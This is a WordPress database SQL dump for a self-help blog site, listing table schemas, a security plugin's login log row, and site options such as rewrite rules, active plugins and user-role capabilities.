-- Softaculous SQL Dump
-- http://www.softaculous.com
--
-- Host: localhost
-- Generation Time: April 10, 2024, 11:30 am
-- Server version: 10.5.24
-- PHP Version: 8.1.27

SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `equipm11_wp81`
--

-- --------------------------------------------------------

--
-- Table structure for table `wpou_commentmeta`
--

CREATE TABLE `wpou_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_comments`
--

CREATE TABLE `wpou_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_links`
--

CREATE TABLE `wpou_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_loginizer_logs`
--

CREATE TABLE `wpou_loginizer_logs` (
  `username` varchar(255) NOT NULL DEFAULT '',
  `time` int(10) NOT NULL DEFAULT 0,
  `count` int(10) NOT NULL DEFAULT 0,
  `lockout` int(10) NOT NULL DEFAULT 0,
  `ip` varchar(255) NOT NULL DEFAULT '',
  `url` varchar(255) NOT NULL DEFAULT '',
  UNIQUE KEY `ip` (`ip`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_loginizer_logs`
--

INSERT INTO `wpou_loginizer_logs` VALUES
('admin', 1712700407, 1, 0, '79.145.123.214', 'https://www.happythinking.com/xmlrpc.php');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_options`
--

CREATE TABLE `wpou_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wpou_options`
--

INSERT INTO `wpou_options` VALUES
(1, 'siteurl', 'https://www.happythinking.com', 'yes'),
(2, 'home', 'https://www.happythinking.com', 'yes'),
(3, 'blogname', 'Happy Thinking', 'yes'),
(4, 'blogdescription', 'Find happiness by changing how you think', 'yes'),
(5, 'users_can_register', '0', 'yes'),
(6, 'admin_email', 'web21@freshgasflow.com', 'yes'),
(7, 'start_of_week', '1', 'yes'),
(8, 'use_balanceTags', '0', 'yes'),
(9, 'use_smilies', '1', 'yes'),
(10, 'require_name_email', '1', 'yes'),
(11, 'comments_notify', '1', 'yes'),
(12, 'posts_per_rss', '10', 'yes'),
(13, 'rss_use_excerpt', '0', 'yes'),
(14, 'mailserver_url', 'mail.example.com', 'yes'),
(15, 'mailserver_login', 'login@example.com', 'yes'),
(16, 'mailserver_pass', 'password', 'yes'),
(17, 'mailserver_port', '110', 'yes'),
(18, 'default_category', '1', 'yes'),
(19, 'default_comment_status', '', 'yes'),
(20, 'default_ping_status', '', 'yes'),
(21, 'default_pingback_flag', '', 'yes'),
(22, 'posts_per_page', '10', 'yes'),
(23, 'date_format', 'F j, Y', 'yes'),
(24, 'time_format', 'g:i a', 'yes'),
(25, 'links_updated_date_format', 'F j, Y g:i a', 'yes'),
(26, 'comment_moderation', '', 'yes'),
(27, 'moderation_notify', '1', 'yes'),
(28, 'permalink_structure', '/%postname%/', 'yes'),
(29, 'rewrite_rules', 'a:94:{s:11:"^wp-json/?$";s:22:"index.php?rest_route=/";s:14:"^wp-json/(.*)?";s:33:"index.php?rest_route=/$matches[1]";s:21:"^index.php/wp-json/?$";s:22:"index.php?rest_route=/";s:24:"^index.php/wp-json/(.*)?";s:33:"index.php?rest_route=/$matches[1]";s:17:"^wp-sitemap\\.xml$";s:23:"index.php?sitemap=index";s:17:"^wp-sitemap\\.xsl$";s:36:"index.php?sitemap-stylesheet=sitemap";s:23:"^wp-sitemap-index\\.xsl$";s:34:"index.php?sitemap-stylesheet=index";s:48:"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$";s:75:"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]";s:34:"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$";s:47:"index.php?sitemap=$matches[1]&paged=$matches[2]";s:47:"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:52:"index.php?category_name=$matches[1]&feed=$matches[2]";s:42:"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$";s:52:"index.php?category_name=$matches[1]&feed=$matches[2]";s:23:"category/(.+?)/embed/?$";s:46:"index.php?category_name=$matches[1]&embed=true";s:35:"category/(.+?)/page/?([0-9]{1,})/?$";s:53:"index.php?category_name=$matches[1]&paged=$matches[2]";s:17:"category/(.+?)/?$";s:35:"index.php?category_name=$matches[1]";s:44:"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?tag=$matches[1]&feed=$matches[2]";s:39:"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?tag=$matches[1]&feed=$matches[2]";s:20:"tag/([^/]+)/embed/?$";s:36:"index.php?tag=$matches[1]&embed=true";s:32:"tag/([^/]+)/page/?([0-9]{1,})/?$";s:43:"index.php?tag=$matches[1]&paged=$matches[2]";s:14:"tag/([^/]+)/?$";s:25:"index.php?tag=$matches[1]";s:45:"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_format=$matches[1]&feed=$matches[2]";s:40:"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_format=$matches[1]&feed=$matches[2]";s:21:"type/([^/]+)/embed/?$";s:44:"index.php?post_format=$matches[1]&embed=true";s:33:"type/([^/]+)/page/?([0-9]{1,})/?$";s:51:"index.php?post_format=$matches[1]&paged=$matches[2]";s:15:"type/([^/]+)/?$";s:33:"index.php?post_format=$matches[1]";s:12:"robots\\.txt$";s:18:"index.php?robots=1";s:13:"favicon\\.ico$";s:19:"index.php?favicon=1";s:48:".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$";s:18:"index.php?feed=old";s:20:".*wp-app\\.php(/.*)?$";s:19:"index.php?error=403";s:18:".*wp-register.php$";s:23:"index.php?register=true";s:32:"feed/(feed|rdf|rss|rss2|atom)/?$";s:27:"index.php?&feed=$matches[1]";s:27:"(feed|rdf|rss|rss2|atom)/?$";s:27:"index.php?&feed=$matches[1]";s:8:"embed/?$";s:21:"index.php?&embed=true";s:20:"page/?([0-9]{1,})/?$";s:28:"index.php?&paged=$matches[1]";s:27:"comment-page-([0-9]{1,})/?$";s:39:"index.php?&page_id=88&cpage=$matches[1]";s:41:"comments/feed/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?&feed=$matches[1]&withcomments=1";s:36:"comments/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?&feed=$matches[1]&withcomments=1";s:17:"comments/embed/?$";s:21:"index.php?&embed=true";s:44:"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:40:"index.php?s=$matches[1]&feed=$matches[2]";s:39:"search/(.+)/(feed|rdf|rss|rss2|atom)/?$";s:40:"index.php?s=$matches[1]&feed=$matches[2]";s:20:"search/(.+)/embed/?$";s:34:"index.php?s=$matches[1]&embed=true";s:32:"search/(.+)/page/?([0-9]{1,})/?$";s:41:"index.php?s=$matches[1]&paged=$matches[2]";s:14:"search/(.+)/?$";s:23:"index.php?s=$matches[1]";s:47:"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?author_name=$matches[1]&feed=$matches[2]";s:42:"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?author_name=$matches[1]&feed=$matches[2]";s:23:"author/([^/]+)/embed/?$";s:44:"index.php?author_name=$matches[1]&embed=true";s:35:"author/([^/]+)/page/?([0-9]{1,})/?$";s:51:"index.php?author_name=$matches[1]&paged=$matches[2]";s:17:"author/([^/]+)/?$";s:33:"index.php?author_name=$matches[1]";s:69:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$";s:80:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]";s:64:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$";s:80:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]";s:45:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$";s:74:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true";s:57:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$";s:81:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]";s:39:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$";s:63:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]";s:56:"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$";s:64:"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]";s:51:"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$";s:64:"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]";s:32:"([0-9]{4})/([0-9]{1,2})/embed/?$";s:58:"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true";s:44:"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$";s:65:"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]";s:26:"([0-9]{4})/([0-9]{1,2})/?$";s:47:"index.php?year=$matches[1]&monthnum=$matches[2]";s:43:"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?year=$matches[1]&feed=$matches[2]";s:38:"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?year=$matches[1]&feed=$matches[2]";s:19:"([0-9]{4})/embed/?$";s:37:"index.php?year=$matches[1]&embed=true";s:31:"([0-9]{4})/page/?([0-9]{1,})/?$";s:44:"index.php?year=$matches[1]&paged=$matches[2]";s:13:"([0-9]{4})/?$";s:26:"index.php?year=$matches[1]";s:27:".?.+?/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:37:".?.+?/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:57:".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:33:".?.+?/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:16:"(.?.+?)/embed/?$";s:41:"index.php?pagename=$matches[1]&embed=true";s:20:"(.?.+?)/trackback/?$";s:35:"index.php?pagename=$matches[1]&tb=1";s:40:"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:47:"index.php?pagename=$matches[1]&feed=$matches[2]";s:35:"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$";s:47:"index.php?pagename=$matches[1]&feed=$matches[2]";s:28:"(.?.+?)/page/?([0-9]{1,})/?$";s:48:"index.php?pagename=$matches[1]&paged=$matches[2]";s:35:"(.?.+?)/comment-page-([0-9]{1,})/?$";s:48:"index.php?pagename=$matches[1]&cpage=$matches[2]";s:24:"(.?.+?)(?:/([0-9]+))?/?$";s:47:"index.php?pagename=$matches[1]&page=$matches[2]";s:27:"[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:37:"[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:57:"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:33:"[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:16:"([^/]+)/embed/?$";s:37:"index.php?name=$matches[1]&embed=true";s:20:"([^/]+)/trackback/?$";s:31:"index.php?name=$matches[1]&tb=1";s:40:"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?name=$matches[1]&feed=$matches[2]";s:35:"([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?name=$matches[1]&feed=$matches[2]";s:28:"([^/]+)/page/?([0-9]{1,})/?$";s:44:"index.php?name=$matches[1]&paged=$matches[2]";s:35:"([^/]+)/comment-page-([0-9]{1,})/?$";s:44:"index.php?name=$matches[1]&cpage=$matches[2]";s:24:"([^/]+)(?:/([0-9]+))?/?$";s:43:"index.php?name=$matches[1]&page=$matches[2]";s:16:"[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:26:"[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:46:"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:41:"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:41:"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:22:"[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";}', 'yes'),
(30, 'hack_file', '0', 'yes'),
(31, 'blog_charset', 'UTF-8', 'yes'),
(32, 'moderation_keys', '', 'no'),
(33, 'active_plugins', 'a:6:{i:0;s:19:"akismet/akismet.php";i:1;s:27:"astra-hooks/astra-hooks.php";i:2;s:23:"loginizer/loginizer.php";i:4;s:23:"wordfence/wordfence.php";i:5;s:24:"wordpress-seo/wp-seo.php";i:6;s:27:"wp-super-cache/wp-cache.php";}', 'yes'),
(34, 'category_base', '', 'yes'),
(35, 'ping_sites', '', 'yes'),
(36, 'comment_max_links', '2', 'yes'),
(37, 'gmt_offset', '0', 'yes'),
(38, 'default_email_category', '1', 'yes'),
(39, 'recently_edited', '', 'no'),
(40, 'template', 'astra', 'yes'),
(41, 'stylesheet', 'astra-child', 'yes'),
(42, 'comment_registration', '1', 'yes'),
(43, 'html_type', 'text/html', 'yes'),
(44, 'use_trackback', '0', 'yes'),
(45, 'default_role', 'subscriber', 'yes'),
(46, 'db_version', '57155', 'yes'),
(47, 'uploads_use_yearmonth_folders', '', 'yes'),
(48, 'upload_path', '', 'yes'),
(49, 'blog_public', '1', 'yes'),
(50, 'default_link_category', '0', 'yes'),
(51, 'show_on_front', 'page', 'yes'),
(52, 'tag_base', '', 'yes'),
(53, 'show_avatars', '', 'yes'),
(54, 'avatar_rating', 'G', 'yes'),
(55, 'upload_url_path', '', 'yes'),
(56, 'thumbnail_size_w', '150', 'yes'),
(57, 'thumbnail_size_h', '150', 'yes'),
(58, 'thumbnail_crop', '1', 'yes'),
(59, 'medium_size_w', '300', 'yes'),
(60, 'medium_size_h', '300', 'yes'),
(61, 'avatar_default', 'mystery', 'yes'),
(62, 'large_size_w', '1024', 'yes'),
(63, 'large_size_h', '1024', 'yes'),
(64, 'image_default_link_type', '', 'yes'),
(65, 'image_default_size', '', 'yes'),
(66, 'image_default_align', '', 'yes'),
(67, 'close_comments_for_old_posts', '1', 'yes'),
(68, 'close_comments_days_old', '14', 'yes'),
(69, 'thread_comments', '', 'yes'),
(70, 'thread_comments_depth', '5', 'yes'),
(71, 'page_comments', '', 'yes'),
(72, 'comments_per_page', '50', 'yes'),
(73, 'default_comments_page', 'newest', 'yes'),
(74, 'comment_order', 'asc', 'yes'),
(75, 'sticky_posts', 'a:0:{}', 'yes'),
(76, 'widget_categories', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(77, 'widget_text', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(78, 'widget_rss', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'),
(79, 'uninstall_plugins', 'a:3:{s:23:"loginizer/loginizer.php";s:22:"loginizer_deactivation";s:24:"wordpress-seo/wp-seo.php";s:14:"__return_false";s:27:"wp-super-cache/wp-cache.php";s:22:"wpsupercache_uninstall";}', 'no'),
(80, 'timezone_string', '', 'yes'),
(81, 'page_for_posts', '0', 'yes'),
(82, 'page_on_front', '88', 'yes'),
(83, 'default_post_format', '0', 'yes'),
(84, 'link_manager_enabled', '0', 'yes'),
(85, 'finished_splitting_shared_terms', '1', 'yes'),
(86, 'site_icon', '1866', 'yes'),
(87, 'medium_large_size_w', '768', 'yes'),
(88, 'medium_large_size_h', '0', 'yes'),
(89, 'wp_page_for_privacy_policy', '3', 'yes'),
(90, 'show_comments_cookies_opt_in', '1', 'yes'),
(91, 'admin_email_lifespan', '1712644006', 'yes'),
(92, 'disallowed_keys', '', 'no'),
(93, 'comment_previously_approved', '1', 'yes'),
(94, 'auto_plugin_theme_update_emails', 'a:0:{}', 'no'),
(95, 'auto_update_core_dev', 'enabled', 'yes'),
(96, 'auto_update_core_minor', 'enabled', 'yes'),
(97, 'auto_update_core_major', 'enabled', 'yes'),
(98, 'wp_force_deactivated_plugins', 'a:0:{}', 'yes'),
(99, 'initial_db_version', '53496', 'yes'),
(100, 'wpou_user_roles', 'a:7:{s:13:"administrator";a:2:{s:4:"name";s:13:"Administrator";s:12:"capabilities";a:72:{s:13:"switch_themes";b:1;s:11:"edit_themes";b:1;s:16:"activate_plugins";b:1;s:12:"edit_plugins";b:1;s:10:"edit_users";b:1;s:10:"edit_files";b:1;s:14:"manage_options";b:1;s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:6:"import";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:8:"level_10";b:1;s:7:"level_9";b:1;s:7:"level_8";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:12:"delete_users";b:1;s:12:"create_users";b:1;s:17:"unfiltered_upload";b:1;s:14:"edit_dashboard";b:1;s:14:"update_plugins";b:1;s:14:"delete_plugins";b:1;s:15:"install_plugins";b:1;s:13:"update_themes";b:1;s:14:"install_themes";b:1;s:11:"update_core";b:1;s:10:"list_users";b:1;s:12:"remove_users";b:1;s:13:"promote_users";b:1;s:18:"edit_theme_options";b:1;s:13:"delete_themes";b:1;s:6:"export";b:1;s:20:"wpseo_manage_options";b:1;s:23:"wf2fa_activate_2fa_self";b:1;s:25:"wf2fa_activate_2fa_others";b:1;s:21:"wf2fa_manage_settings";b:1;s:12:"yop_poll_add";b:1;s:17:"yop_poll_edit_own";b:1;s:20:"yop_poll_edit_others";b:1;s:19:"yop_poll_delete_own";b:1;s:22:"yop_poll_delete_others";b:1;s:20:"yop_poll_results_own";b:1;s:23:"yop_poll_results_others";b:1;}}s:6:"editor";a:2:{s:4:"name";s:6:"Editor";s:12:"capabilities";a:43:{s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:15:"wpseo_bulk_edit";b:1;s:28:"wpseo_edit_advanced_metadata";b:1;s:12:"yop_poll_add";b:1;s:17:"yop_poll_edit_own";b:1;s:20:"yop_poll_edit_others";b:1;s:19:"yop_poll_delete_own";b:1;s:22:"yop_poll_delete_others";b:1;s:20:"yop_poll_results_own";b:1;s:23:"yop_poll_results_others";b:1;}}s:6:"author";a:2:{s:4:"name";s:6:"Author";s:12:"capabilities";a:17:{s:12:"upload_files";b:1;s:10:"edit_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:4:"read";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;s:22:"delete_published_posts";b:1;s:12:"yop_poll_add";b:1;s:17:"yop_poll_edit_own";b:1;s:20:"yop_poll_edit_others";b:1;s:19:"yop_poll_delete_own";b:1;s:22:"yop_poll_delete_others";b:1;s:20:"yop_poll_results_own";b:1;s:23:"yop_poll_results_others";b:1;}}s:11:"contributor";a:2:{s:4:"name";s:11:"Contributor";s:12:"capabilities";a:5:{s:10:"edit_posts";b:1;s:4:"read";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;}}s:10:"subscriber";a:2:{s:4:"name";s:10:"Subscriber";s:12:"capabilities";a:2:{s:4:"read";b:1;s:7:"level_0";b:1;}}s:13:"wpseo_manager";a:2:{s:4:"name";s:11:"SEO Manager";s:12:"capabilities";a:38:{s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:15:"wpseo_bulk_edit";b:1;s:28:"wpseo_edit_advanced_metadata";b:1;s:20:"wpseo_manage_options";b:1;s:23:"view_site_health_checks";b:1;}}s:12:"wpseo_editor";a:2:{s:4:"name";s:10:"SEO Editor";s:12:"capabilities";a:36:{s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:15:"wpseo_bulk_edit";b:1;s:28:"wpseo_edit_advanced_metadata";b:1;}}}', 'yes'),
(101, 'fresh_site', '0', 'yes'),
(102, 'user_count', '2', 'no'),
(103, 'widget_block', 'a:6:{i:2;a:1:{s:7:"content";s:19:"<!-- wp:search /-->";}i:3;a:1:{s:7:"content";s:154:"<!-- wp:group --><div class="wp-block-group"><!-- wp:heading --><h2>Recent Posts</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->";}i:4;a:1:{s:7:"content";s:227:"<!-- wp:group --><div class="wp-block-group"><!-- wp:heading --><h2>Recent Comments</h2><!-- /wp:heading --><!-- wp:latest-comments {"displayAvatar":false,"displayDate":false,"displayExcerpt":false} /--></div><!-- /wp:group -->";}i:5;a:1:{s:7:"content";s:146:"<!-- wp:group --><div class="wp-block-group"><!-- wp:heading --><h2>Archives</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->";}i:6;a:1:{s:7:"content";s:150:"<!-- wp:group --><div class="wp-block-group"><!-- wp:heading --><h2>Categories</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->";}s:12:"_multiwidget";i:1;}', 'yes'),
